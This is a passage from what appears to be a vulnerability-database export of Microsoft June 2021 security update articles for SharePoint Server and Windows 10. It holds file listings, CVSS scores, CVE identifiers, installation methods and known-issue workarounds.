12:44 \nriched20.dll| riched20.dll| 15.0.5013.1000| 2239672| 12-May-21| 12:44 \nriched20.dll_0001| riched20.dll| 15.0.5013.1000| 2239672| 12-May-21| 12:44 \nwac.office.riched20.dll| riched20.dll| 15.0.5013.1000| 2239672| 12-May-21| 12:44 \nxlsrv.ecs.riched20.dll| riched20.dll| 15.0.5013.1000| 2239672| 12-May-21| 12:44 \nconversion.msvcp100.dll| msvcp100.dll| 10.00.40219.325| 608080| 11-May-21| 03:39 \nmsvcp100.dll| msvcp100.dll| 10.00.40219.325| 608080| | \nppt.conversion.msvcp100.dll| msvcp100.dll| 10.00.40219.325| 608080| 11-May-21| 03:39 \nppt.edit.msvcp100.dll| msvcp100.dll| 10.00.40219.325| 608080| 11-May-21| 03:39 \nwac.msvcp100.dll| msvcp100.dll| 10.00.40219.325| 608080| 11-May-21| 03:39 \nconversion.msvcr100.dll| msvcr100.dll| 10.00.40219.325| 829264| 11-May-21| 03:39 \nmsvcr100.dll| msvcr100.dll| 10.00.40219.325| 829264| | \nppt.conversion.msvcr100.dll| msvcr100.dll| 10.00.40219.325| 829264| 11-May-21| 03:39 \nppt.edit.msvcr100.dll| msvcr100.dll| 10.00.40219.325| 829264| 11-May-21| 03:39 \nwac.msvcr100.dll| msvcr100.dll| 10.00.40219.325| 829264| 11-May-21| 03:39 \nipfshelp.xml.1031| microsoft.office.infopath.server.dll-help.xml| | 226332| 12-May-21| 12:41 \nipfshelp.xml.3082| microsoft.office.infopath.server.dll-help.xml| | 224609| 12-May-21| 12:41 \nipfshelp.xml.1036| microsoft.office.infopath.server.dll-help.xml| | 226326| 12-May-21| 12:39 \nipfshelp.xml.1040| microsoft.office.infopath.server.dll-help.xml| | 224635| 12-May-21| 12:41 \nipfshelp.xml.1041| microsoft.office.infopath.server.dll-help.xml| | 240036| 12-May-21| 12:50 \nipfshelp.xml.1042| microsoft.office.infopath.server.dll-help.xml| | 226435| 12-May-21| 12:41 \nipfshelp.xml.1046| microsoft.office.infopath.server.dll-help.xml| | 222037| 12-May-21| 12:40 \nipfshelp.xml.1049| microsoft.office.infopath.server.dll-help.xml| | 253831| 12-May-21| 12:41 \nipfshelp.xml.2052| microsoft.office.infopath.server.dll-help.xml| | 208564| 12-May-21| 12:40 \nipfshelp.xml.1028| microsoft.office.infopath.server.dll-help.xml| | 211239| 12-May-21| 12:41 \nconversion.proof.mshy2_hu.lex| mshy3hu.lex| | 933579| 12-May-21| 12:45 \nmshy2_en.lex_1038| mshy3hu.lex| | 933579| 12-May-21| 12:45 \nwac.conversion.proof.mshy2_hu.lex| mshy3hu.lex| | 933579| 12-May-21| 12:45 \nconversion.proof.mshy2_hu.dll| mshy3hu.dll| 15.0.0.1| 218984| 12-May-21| 12:45 \nmshy2_en.dll_1038| mshy3hu.dll| 15.0.0.1| 218984| 12-May-21| 12:45 \nwac.conversion.proof.mshy2_hu.dll| mshy3hu.dll| 15.0.0.1| 218984| 12-May-21| 12:45 \ndsigres.cab_14.1026| dsigres.cab| | 79744| 12-May-21| 12:39 \ndsigres.cab_14.1027| dsigres.cab| | 79578| 12-May-21| 12:39 \ndsigres.cab_14.1029| dsigres.cab| | 79808| 12-May-21| 12:39 \ndsigres.cab_14.1032| dsigres.cab| | 80090| 12-May-21| 12:39 \ndsigres.cab_14.1061| dsigres.cab| | 79554| 12-May-21| 12:39 \ndsigres.cab_14.1069| dsigres.cab| | 79556| 12-May-21| 12:39 \ndsigres.cab_14.1035| dsigres.cab| | 79988| 12-May-21| 12:39 \ndsigres.cab_14.1110| dsigres.cab| | 79504| 12-May-21| 12:39 \ndsigres.cab_14.1050| dsigres.cab| | 79632| 12-May-21| 12:40 \ndsigres.cab_14.1038| dsigres.cab| | 79728| 12-May-21| 12:40 \ndsigres.cab_14.1087| dsigres.cab| | 79810| 12-May-21| 12:40 \ndsigres.cab_14.1063| dsigres.cab| | 79874| 12-May-21| 12:40 \ndsigres.cab_14.1062| dsigres.cab| | 79640| 12-May-21| 12:40 \ndsigres.cab_14.1044| dsigres.cab| | 79726| 12-May-21| 12:40 \nifsmain.css_14.1164| ifsmain.css| | 8195| 12-May-21| 12:40 \nintlcorestrings.js_14.1164| intlcorestrings.js| | 25447| 12-May-21| 12:40 \ndsigres.cab_14.2070| dsigres.cab| | 79544| 12-May-21| 12:40 \ndsigres.cab_14.1048| dsigres.cab| | 79820| 12-May-21| 12:40 \ndsigres.cab_14.1051| dsigres.cab| | 79770| 12-May-21| 12:40 \ndsigres.cab_14.1060| dsigres.cab| | 79880| 12-May-21| 12:40 \ndsigres.cab_14.2074| dsigres.cab| | 79684| 12-May-21| 12:40 \ndsigres.cab_14.1055| dsigres.cab| | 79600| 12-May-21| 12:40 \ndsigres.cab_14.1058| dsigres.cab| | 79886| 12-May-21| 12:40 \ncore.js_14| core.js| | 636448| 12-May-21| 12:45 \nmobileformserver.aspx_14| mobileformserver.aspx| | 1036| 12-May-21| 12:45 \nsignatureeula.aspx_14| signatureeula.formserver.aspx| | 9143| 12-May-21| 12:45 \nifsintl.dll.1033| microsoft.office.infopath.server.intl.resources.dll| 15.0.5197.1000| 191096| 12-May-21| 12:45 \nipform.xml| ipfs.format.ps1xml| | 15682| 12-May-21| 12:45 \ncore.js| core.js| | 646659| 12-May-21| 12:45 \nformsettings.xml| formsettings.xml| | 19687| 12-May-21| 12:45 \nformsettings.aspx| formsettings.aspx| | 18804| 12-May-21| 12:45 \nifswfe.dll| microsoft.office.infopath.server.dll| 15.0.5351.1000| 3027352| 12-May-21| 12:45 \nifswfepriv.dll| microsoft.office.infopath.server.dll| 15.0.5351.1000| 3027352| 12-May-21| 12:45 \nifsdefaultintl.dll| microsoft.office.infopath.server.intl.dll| 15.0.5197.1000| 191096| 12-May-21| 12:45 \nipomload.dll| microsoft.office.infopath.clrloader.dll| 15.0.4615.1000| 17128| 12-May-21| 12:44 \n \n## Information about protection and security\n\nProtect yourself online: [Windows Security support](<https://support.microsoft.com/hub/4099151>)Learn how we guard against cyber threats: [Microsoft Security](<https://www.microsoft.com/security>)\n\n## Change history\n\nThe following table summarizes some of the most important changes to this topic.Date| Description \n---|--- \nJune 29, 2021| Added a known issue in the \"Known issues in this update\" section. \nAugust 10, 2021| Updated the \"Known issues in this update\" section to provide a resolution to the issue.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-08T07:00:00", "type": "mskb", "title": "Description of the security update for SharePoint Enterprise Server 2013: June 8, 2021 (KB4011698)", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31963"], "modified": "2021-06-08T07:00:00", "id": "KB4011698", "href": "https://support.microsoft.com/en-us/help/4011698", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2022-08-24T11:32:09", "description": "None\n## Summary\n\nThis security update resolves a Microsoft SharePoint Server remote code execution vulnerability. To learn more about the vulnerability, see [Microsoft Common Vulnerabilities and Exposures CVE-2021-31963](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31963>) and [Microsoft Common Vulnerabilities and Exposures CVE-2021-31966](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31966>).\n\n**Note: **To apply this security update, you must have the release version of [Service Pack 1 for Microsoft SharePoint Server 2013](<http://support.microsoft.com/kb/2880552>) installed on the computer.\n\n## How to get and install the update\n\n### Method 1: Microsoft Update\n\nThis update is available from Microsoft Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to get security updates automatically, see [Windows Update: FAQ](<https://support.microsoft.com/en-us/help/12373/windows-update-faq>).\n\n### Method 2: Microsoft Update Catalog\n\nTo get the standalone package for this update, go to the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/Search.aspx?q=KB5001954>) website.\n\n### Method 3: Microsoft Download Center\n\nYou can get the standalone update package through the Microsoft Download Center. Follow the installation instructions on the download page to install the update.\n\n * ![Download icon](https://support.content.office.net/en-us/media/2ae362dc-2179-d733-e930-e231c68a2c4a.png)[Download security update 5001954 for the 64-bit version of SharePoint Enterprise Server 2013](<http://www.microsoft.com/download/details.aspx?familyid=d3d98284-da2c-429b-9081-3dc8a0a1217c>)\n\n## More information\n\n### Security update deployment information\n\nFor deployment information about this update, see Security update deployment information: June 8, 2021 (KB5004128).\n\n### Security update replacement information\n\nThis security update replaces previously released security update [4493170](<http://support.microsoft.com/kb/4493170>).\n\n### File hash information\n\nFile name| | SHA256 hash \n---|---|--- \ncoreserverloc2013-kb5001954-fullfile-x64-glb.exe| | 6F042F65B5C388D023E31890761827AB0FBBAB457B26AEAD342360C233CF64BC \n \n### File information\n\nDownload [the list of files that are included in security update 5001954](<https://download.microsoft.com/download/2/d/7/2d75ecc8-3b83-4e28-801b-1f7f296cfc2a/5001954.csv>).\n\n## Information about protection and security\n\nProtect yourself online: [Windows Security support](<https://support.microsoft.com/hub/4099151>)Learn how we guard against cyber threats: [Microsoft Security](<https://www.microsoft.com/security>)\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-08T07:00:00", "type": "mskb", "title": "Description of the security update for SharePoint Enterprise Server 2013: June 8, 2021 (KB5001954)", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31963", "CVE-2021-31966"], "modified": "2021-06-08T07:00:00", "id": "KB5001954", "href": "https://support.microsoft.com/en-us/help/5001954", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-01-13T10:52:38", "description": "None\n**5/11/21** \n**REMINDER **Windows 10, version 1909 reached end of service on May 11, 2021 for devices running the Home, Pro, Pro for Workstation, Nano Container, and Server SAC editions. After May 11, 2021, these devices will no longer receive monthly security and quality updates that contain protection from the latest security threats. To continue receiving security and quality updates, Microsoft recommends updating to the latest version of Windows 10.We will continue to service the following editions: Enterprise, Education, and IoT Enterprise.\n\n**4/13/21 \nREMINDER **Microsoft removed the Microsoft Edge Legacy desktop application that is out of support in March 2021. In the April 13, 2021 release, we installed the new Microsoft Edge. For more information, see [New Microsoft Edge to replace Microsoft Edge Legacy with April\u2019s Windows 10 Update Tuesday release](<https://aka.ms/EdgeLegacyEOS>).\n\n**11/19/20** \nFor information about Windows update terminology, see the article about the [types of Windows updates](<https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/standard-terminology-software-updates>) and the [monthly quality update types](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/windows-10-update-servicing-cadence/ba-p/222376>). To view other notes and messages, see the Windows 10, version 1909 update history home page.**Note **Follow [@WindowsUpdate](<https://twitter.com/windowsupdate>) to find out when new content is published to the release information dashboard.\n\n**Note **This release also contains updates for Microsoft HoloLens (OS Build 18363.1116) released June 8, 2021. Microsoft will release an update directly to the Windows Update Client to improve Windows Update reliability on Microsoft HoloLens that have not updated to this most recent OS Build.\n\n## Highlights\n\n * Updates to improve security when Windows performs basic operations.\n * Updates to improve Windows OLE (compound documents) security.\n * Updates for verifying usernames and passwords.\n * Updates for storing and managing files.\n * Updates to improve security when using input devices such as a mouse, keyboard, or pen.\n * Updates an issue that might prevent you from signing in to some Microsoft 365 desktop client apps after installing the May 11, 2021 or later update and restarting your device.\n\n## Improvements and fixes\n\nThis security update includes quality improvements. Key changes include:\n\n * Addresses an issue with an inconsistent shutdown during Windows Update that damages the Windows Management Instrumentation (WMI) repository. As a result, the Managed Object Format (MOF) Advance Installer fails.\n * Addresses an issue that might prevent you from signing in to some Microsoft 365 desktop client apps after installing the May 11, 2021 or later update and restarting your device. You might also receive an 80080300 error or \"We ran into a problem. Reconnecting\u2026\" when attempting to authenticate or sign in to Teams.\n * Security updates to the Microsoft Scripting Engine, Windows App Platform and Frameworks, Windows Input and Composition, Windows Management, Windows Cloud Infrastructure, Windows Authentication, Windows Fundamentals, Windows Virtualization, Windows Kernel, Windows HTML Platform, and Windows Storage and Filesystem.\nIf you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device.For more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n**Windows Update Improvements**Microsoft has released an update directly to the Windows Update client to improve reliability. Any device running Windows 10 configured to receive updates automatically from Windows Update, including Enterprise and Pro editions, will be offered the latest Windows 10 feature update based on device compatibility and Windows Update for Business deferral policy. This doesn't apply to long-term servicing editions.\n\n## Known issues in this update\n\n### \n\n__\n\nClick or tap to view the known issues\n\n**Symptom**| **Workaround** \n---|--- \nAfter installing this or later updates, apps accessing event logs on remote devices might be unable to connect. This issue might occur if the local or remote has not yet installed updates released June 8, 2021 or later. Affected apps are using certain [legacy Event Logging APIs](<https://docs.microsoft.com/en-us/windows/win32/eventlog/event-logging-reference>). You might receive an error when attempting to connect, for example:\n\n * error 5: access is denied \n * error 1764: The requested operation is not supported.\n * System.InvalidOperationException, \nMicrosoft.PowerShell.Commands.GetEventLogCommand\n * Windows has not provided an error code.\n**Note** Event Viewer and other apps using current non-legacy APIs to access event logs should not be affected.| This is expected due to security hardening changes relating to [Event Tracing for Windows (ETW)](<https://docs.microsoft.com/en-us/windows/win32/etw/event-tracing-portal>) for [CVE-2021-31958](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31958>). This issue is resolved if the local and remote devices both have installed updates released June 8, 2021 or later. \nAfter installing this update or later, the news and interests button in the Windows taskbar might have blurry text on certain display configurations.| This issue is resolved in KB5003698. \n \n## How to get this update\n\n**Before installing this update**Prerequisite:You **must **install the April 13, 2021 servicing stack update (SSU) (KB5001406) or the latest SSU (KB5003710) before installing the latest cumulative update (LCU). SSUs improve the reliability of the update process to mitigate potential issues while installing the LCU and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and Servicing Stack Updates (SSU): Frequently Asked Questions.If you are using Windows Update, the latest SSU will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/home.aspx>).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nWindows Update for Business| Yes| None. This update will be downloaded and installed automatically from Windows Update in accordance with configured policies. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5003635>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 10, version 1903 and later**Classification**: Security Updates \n**File information**For a list of the files that are provided in this update, download the [file information for cumulative update 5003635](<https://download.microsoft.com/download/3/b/a/3babb75d-f970-4ed1-ba97-b69bc52e4049/5003635.csv>). \n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-06-08T07:00:00", "type": "mskb", "title": "June 8, 2021\u2014KB5003635 (OS Build 18363.1621)\n", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31958", "CVE-2021-33739"], "modified": "2021-06-08T07:00:00", "id": "KB5003635", "href": "https://support.microsoft.com/en-us/help/5003635", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-03-15T10:46:28", "description": "None\n**4/13/21 \nREMINDER **Microsoft removed the Microsoft Edge Legacy desktop application that is out of support in March 2021. In the April 13, 2021 release, we installed the new Microsoft Edge. For more information, see [New Microsoft Edge to replace Microsoft Edge Legacy with April\u2019s Windows 10 Update Tuesday release](<https://aka.ms/EdgeLegacyEOS>).\n\n**11/17/20**For information about Windows update terminology, see the article about the [types of Windows updates](<https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/standard-terminology-software-updates>) and the [monthly quality update types](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/windows-10-update-servicing-cadence/ba-p/222376>). To view other notes and messages, see the Windows 10, version 2004 update history [home page](<https://support.microsoft.com/en-us/help/4555932>).**Note **Follow [@WindowsUpdate](<https://twitter.com/windowsupdate>) to find out when new content is published to the release information dashboard.\n\n## Highlights\n\n * Updates to improve security when using input devices such as a mouse, keyboard, or pen.\n * Updates to improve Windows OLE (compound documents) security.\n * Updates for verifying usernames and passwords.\n * Updates to improve security when Windows performs basic operations.\n * Updates for storing and managing files.\n\n## Improvements and fixes\n\n**Note **To view the list of addressed issues, click or tap the OS name to expand the collapsible section.\n\n### \n\n__\n\nWindows 10 servicing stack update - 19041.1022, 19042.1022, and 19043.1022 \n\n * This update makes quality improvements to the servicing stack, which is the component that installs Windows updates. Servicing stack updates (SSU) ensure that you have a robust and reliable servicing stack so that your devices can receive and install Microsoft updates.\n\n### \n\n__\n\nWindows 10, version 21H1\n\nThis security update includes quality improvements. Key changes include:\n\n * This build includes all the improvements from Windows 10, version 2004.\n * No additional issues were documented for this release.\n\n### \n\n__\n\nWindows 10, version 20H2\n\nThis security update includes quality improvements. Key changes include:\n\n * This build includes all the improvements from Windows 10, version 2004.\n * No additional issues were documented for this release.\n\n### \n\n__\n\nWindows 10, version 2004\n\n**Note: **This release also contains updates for Microsoft HoloLens (OS Build 19041.1154) released June 8, 2021. Microsoft will release an update directly to the Windows Update Client to improve Windows Update reliability on Microsoft HoloLens that have not updated to this most recent OS Build.\n\nThis security update includes quality improvements. Key changes include:\n\n * Security updates to the Microsoft Scripting Engine, Windows App Platform and Frameworks, Windows Input and Composition, Windows Management, Windows Cloud Infrastructure, Windows Authentication, Windows Fundamentals, Windows Virtualization, Windows Kernel, Windows HTML Platform, and Windows Storage and Filesystems.\nIf you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device.For more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n**Windows Update Improvements**Microsoft has released an update directly to the Windows Update client to improve reliability. Any device running Windows 10 configured to receive updates automatically from Windows Update, including Enterprise and Pro editions, will be offered the latest Windows 10 feature update based on device compatibility and Windows Update for Business deferral policy. This doesn't apply to long-term servicing editions.\n\n## Known issues in this update\n\n### \n\n__\n\nClick or tap to view the known issues\n\n**Symptom**| **Workaround** \n---|--- \nWhen using the Microsoft Japanese Input Method Editor (IME) to enter Kanji characters in an app that automatically allows the input of Furigana characters, you might not get the correct Furigana characters. You might need to enter the Furigana characters manually.**Note **The affected apps are using the **ImmGetCompositionString()** function.| This issue is resolved in KB5005101. \nA small subset of users have reported lower than expected performance in games after installing this update. Most users affected by this issue are running games full screen or borderless windowed modes and using two or more monitors.| This issue is resolved in KB5003690. \nAfter installing this update, 5.1 Dolby Digital audio may play containing a high-pitched noise or squeak in certain apps when using certain audio devices and Windows settings.**Note **This issue does not occur when stereo is used.| This issue is resolved in KB5003690. \nDevices with Windows installations created from custom offline media or custom ISO image might have [Microsoft Edge Legacy](<https://support.microsoft.com/en-us/microsoft-edge/what-is-microsoft-edge-legacy-3e779e55-4c55-08e6-ecc8-2333768c0fb0>) removed by this update, but not automatically replaced by the new Microsoft Edge. This issue is only encountered when custom offline media or ISO images are created by slipstreaming this update into the image without having first installed the standalone servicing stack update (SSU) released March 29, 2021 or later.**Note **Devices that connect directly to Windows Update to receive updates are not affected. This includes devices using Windows Update for Business. Any device connecting to Windows Update should always receive the latest versions of the SSU and latest cumulative update (LCU) without any extra steps. | To avoid this issue, be sure to first slipstream the SSU released March 29, 2021 or later into the custom offline media or ISO image before slipstreaming the LCU. To do this with the combined SSU and LCU packages now used for Windows 10, version 20H2 and Windows 10, version 2004, you will need to extract the SSU from the combined package. Use the following steps to extract the SSU:\n\n 1. Extract the cab from the msu via this command line (using the package for KB5000842 as an example): **expand Windows10.0-KB5000842-x64.msu /f:Windows10.0-KB5000842-x64.cab <destination path>**\n 2. Extract the SSU from the previously extracted cab via this command line: **expand Windows10.0-KB5000842-x64.cab /f:* <destination path>**\n 3. You will then have the SSU cab, in this example named **SSU-19041.903-x64.cab**. Slipstream this file into your offline image first, then the LCU.\nIf you have already encountered this issue by installing the OS using affected custom media, you can mitigate it by directly installing the [new Microsoft Edge](<https://www.microsoft.com/edge>). If you need to broadly deploy the new Microsoft Edge for business, see [Download and deploy Microsoft Edge for business](<https://www.microsoft.com/edge/business/download>). \nAfter installing this or later updates, apps accessing event logs on remote devices might be unable to connect. This issue might occur if the local or remote has not yet installed updates released June 8, 2021 or later. Affected apps are using certain [legacy Event Logging APIs](<https://docs.microsoft.com/en-us/windows/win32/eventlog/event-logging-reference>). You might receive an error when attempting to connect, for example:\n\n * error 5: access is denied\n * error 1764: The requested operation is not supported.\n * System.InvalidOperationException, \nMicrosoft.PowerShell.Commands.GetEventLogCommand\n * Windows has not provided an error code.\n**Note** Event Viewer and other apps using current non-legacy APIs to access event logs should not be affected.| This is expected due to security hardening changes relating to [Event Tracing for Windows (ETW)](<https://docs.microsoft.com/en-us/windows/win32/etw/event-tracing-portal>) for [CVE-2021-31958](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31958>). This issue is resolved if the local and remote devices both have installed updates released June 8, 2021 or later. \nAfter installing this update or later, the news and interests button in the Windows taskbar might have blurry text on certain display configurations.| This issue is resolved in KB5003690. \nAfter installing this update, Internet Explorer 11 (IE11) or apps using the 64-bit version of the WebBrowser control might fail to open PDFs or may render as just a gray background using the Adobe Acrobat plug-in.**Note **Internet Explorer is only affected if **Enable 64-bit Processes for Enhanced Protected Mode** is enabled in the **Advanced** tab in **Internet Options**.| This issue is resolved in KB5004760. \n \n## How to get this update\n\n**Before installing this update**Microsoft now combines the latest servicing stack update (SSU) for your operating system with the latest cumulative update (LCU). For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and Servicing Stack Updates (SSU): Frequently Asked Questions.Prerequisite:For Windows Server Update Services (WSUS) deployment:\n\n * Install the May 11, 2021 update (KB5003173) before you install the latest cumulative update.\nFor offline Deployment Image Servicing and Management (**DISM.exe**) deployment:\n\n * If an image does not have the February 24, 2021 (KB4601382) or later cumulative update, install the January 12, 2021 SSU (KB4598481) and the May 11, 2021 update (KB5003173).\n**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nWindows Update for Business| Yes| None. This update will be downloaded and installed automatically from Windows Update in accordance with configured policies. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5003637>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 10, version 1903 and later**Classification**: Security Updates \n \n**If you want to remove the LCU**To remove the LCU after installing the combined SSU and LCU package, use the [DISM/Remove-Package](<https://docs.microsoft.com/en-us/windows-hardware/manufacture/desktop/dism-operating-system-package-servicing-command-line-options>) command line option with the LCU package name as the argument. You can find the package name by using this command: **DISM /online /get-packages**.Running [Windows Update Standalone Installer](<https://support.microsoft.com/en-us/topic/description-of-the-windows-update-standalone-installer-in-windows-799ba3df-ec7e-b05e-ee13-1cdae8f23b19>) (**wusa.exe**) with the **/uninstall **switch on the combined package will not work because the combined package contains the SSU. You cannot remove the SSU from the system after installation.\n\n**File information**For a list of the files that are provided in this update, download the [file information for cumulative update 5003637](<https://download.microsoft.com/download/6/a/0/6a0b9a84-d94b-426b-926f-2be0af9901b6/5003637.csv>). For a list of the files that are provided in the servicing stack update, download the [file information for the SSU - version 19041.1022, 19042.1022, and 19043.1022](<https://download.microsoft.com/download/d/b/e/dbed46a6-e743-4aeb-b2a1-202c3dbe383e/SSU_version_19041.1022.csv>). \n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-06-08T07:00:00", "type": "mskb", "title": "June 8, 2021\u2014KB5003637 (OS Builds 19041.1052, 19042.1052, and 19043.1052)\n", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31958", "CVE-2021-33739"], "modified": "2021-06-08T07:00:00", "id": "KB5003637", "href": "https://support.microsoft.com/en-us/help/5003637", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-03-15T10:41:46", "description": "None\n## Summary\n\nThis security update resolves a Microsoft SharePoint remote code execution vulnerability, SharePoint spoofing vulnerability, SharePoint Server information disclosure vulnerability, and SharePoint Server remote code execution vulnerability. To learn more about the vulnerabilities, see the following security advisories:\n\n * [Microsoft Common Vulnerabilities and Exposures CVE-2021-26420](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26420>)\n * [Microsoft Common Vulnerabilities and Exposures CVE-2021-31948](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31948>)\n * [Microsoft Common Vulnerabilities and Exposures CVE-2021-31950](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31950>)\n * [Microsoft Common Vulnerabilities and Exposures CVE-2021-31963](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31963>)\n * [Microsoft Common Vulnerabilities and Exposures CVE-2021-31964](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31964>)\n * [Microsoft Common Vulnerabilities and Exposures CVE-2021-31965](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31965>)\n * [Microsoft Common Vulnerabilities and Exposures CVE-2021-31966](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31966>)\n\n**Note: **To apply this security update, you must have the release version of Microsoft SharePoint Enterprise Server 2016 installed on the computer.\n\nThis public update delivers Feature Pack 2 for SharePoint Server 2016. Feature Pack 2 contains the following feature:\n\n * SharePoint Framework (SPFx)\nThis public update also delivers all the features that were included in Feature Pack 1 for SharePoint Server 2016, including:\n * Administrative Actions Logging\n * MinRole enhancements\n * SharePoint Custom Tiles\n * Hybrid Taxonomy\n * OneDrive API for SharePoint on-premises\n * OneDrive for Business modern user experience (available to Software Assurance customers)\nThe 